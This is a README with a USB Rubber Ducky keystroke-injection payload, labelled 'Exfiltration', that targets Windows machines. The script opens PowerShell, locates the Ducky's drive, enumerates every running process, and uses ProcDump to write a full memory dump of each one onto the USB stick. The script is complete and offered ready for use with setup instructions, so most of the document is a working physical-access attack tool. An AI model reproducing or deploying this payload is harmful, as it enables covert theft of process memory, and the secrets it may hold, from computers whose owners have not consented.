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# Dump Windows Memory Through ProcDump
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This payload allows you to dump the RAM memory used by a running application by using the free software ProcDump.
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**Category**: Exfiltration
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## Table of Contents
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- [Dependencies](#dependencies)
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- [Description](#description)
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- [Yours TODO](#yours-todo)
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- [Read More](#read-more)
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- [Credits](#credits)
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## Dependencies
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* Authorization to execute powershell commands
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## Description
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This payload targets machines running Windows operating systems capable of executing commands via PowerShell.
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Its first action is to use the Rubber Ducky DETECT_READY\[3] extension to avoid unnecessary waiting times before the operating system is ready.
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Once the OS is active, the payload opens a PowerShell shell without administrator privileges and identifies the name assigned to the Rubber Ducky by combining Windows' Get-Volume and DriveLetter commands.
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Subsequently, to avoid requests for administrative permissions during the memory dumping operation with ProcDump, the payload directly moves to the Rubber Ducky, where it executes ProcDump, allowing the output to be stored directly on the USB drive without the need for additional permissions.
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To avoid potential complications related to exception handling during the execution of ProcDump, the payload uses the PID number instead of the process name.
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To obtain all active process PIDs the tasklist command is used, which provides this information comprehensively.
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## Yours TODO
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1. Download ProcDump\[5].
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2. Move the extracted ProcDump folder or directly the executable, as you prefer, inside Rubber Ducky's memory.
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3. Then you have to change the variable `#WHAT_EXE_DO_YOU_WANT_TO_USE` if you want to use an executable other than `procdump64a.exe`, i.e. `procdump.exe` and, in this case, you have to change the variable to `procdump`.
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4. When you put the executable(s) inside the Rubber Ducky memory you must indicate the path where is stored, i.e. if the executable is inside the path `F:\ProcDump\Procdump\procdump.exe` you must change the variable `#PATH_TO_EXE` into `\ProcDump\Procdump\` mean while if it is inside the path `F:\somethingelse\procdump.exe` you must change this variable into `\somethingelse\`.
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## Read More
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- \[1] [ProcDump Documentation](https://learn.microsoft.com/en-us/sysinternals/downloads/procdump)
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- \[2] [How to collect memory dumps using ProcDump](https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB0253710)
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- \[3] [DETECT READY - SMARTER INITIAL DELAYS FOR KEYSTROKE INJECTION ATTACKS WITH THE USB RUBBER DUCKY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready)
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- \[4] [Physical Medium Exfiltration](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration)
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- \[5] [Download ProcDump for Windows target](https://download.sysinternals.com/files/Procdump.zip)
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## Credits
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<h2 align="center"> Aleff :octocat: </h2>
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<div align=center>
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<table>
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<tr>
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<td align="center" width="96">
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<a href="https://github.com/aleff-github">
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<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
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</a>
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<br>Github
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</td>
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<td align="center" width="96">
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<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
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<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
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</a>
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<br>Linkedin
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</td>
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</tr>
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</table>
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</div>
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REM ########################################################
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REM # #
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REM # Title : Dump Windows Memory Through ProcDump #
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REM # Author : Aleff #
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REM # Version : 1.0 #
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REM # Category : Exfiltration #
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REM # Target : Windows #
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REM # #
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REM ########################################################
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REM Requirements:
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REM - Authorization to execute powershell commands
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REM You must change it to 'procdump' if you want to use procdump.exe instead of procdump64a.exe
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DEFINE #WHAT_EXE_DO_YOU_WANT_TO_USE procdump64a
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REM Path to the EXE file stored in the usb, i.e. if 'F:\ProcDump\Procdump\procdump.exe' you must use '\ProcDump\Procdump\'
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DEFINE #PATH_TO_EXE \ProcDump\Procdump\
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REM Driver Label of your RubberDucky - Default: DUCKY
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DEFINE #DUCKY_DRIVE_LABEL DUCKY
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EXTENSION DETECT_READY
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REM VERSION 1.1
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REM AUTHOR: Korben
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REM_BLOCK DOCUMENTATION
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USAGE:
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Extension runs inline (here)
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Place at beginning of payload (besides ATTACKMODE) to act as dynamic
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boot delay
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TARGETS:
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Any system that reflects CAPSLOCK will detect minimum required delay
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Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
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END_REM
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REM CONFIGURATION:
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DEFINE #RESPONSE_DELAY 25
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DEFINE #ITERATION_LIMIT 120
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VAR $C = 0
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WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
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CAPSLOCK
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DELAY #RESPONSE_DELAY
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$C = ($C + 1)
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END_WHILE
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CAPSLOCK
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END_EXTENSION
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GUI r
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DELAY 2000
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STRING powershell
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ENTER
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DELAY 2000
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STRINGLN_POWERSHELL
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$m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
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$m+=":";
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cd "$m\\";
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$a=tasklist /FI "Status eq Running" /FO LIST;
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foreach ($i in $a){
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if ( $i -like '*PID*'){
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$i -match 'PID.\s+(.+)';
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".#PATH_TO_EXE#WHAT_EXE_DO_YOU_WANT_TO_USE.exe" -ma $matches[1];
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}
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}
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exit;
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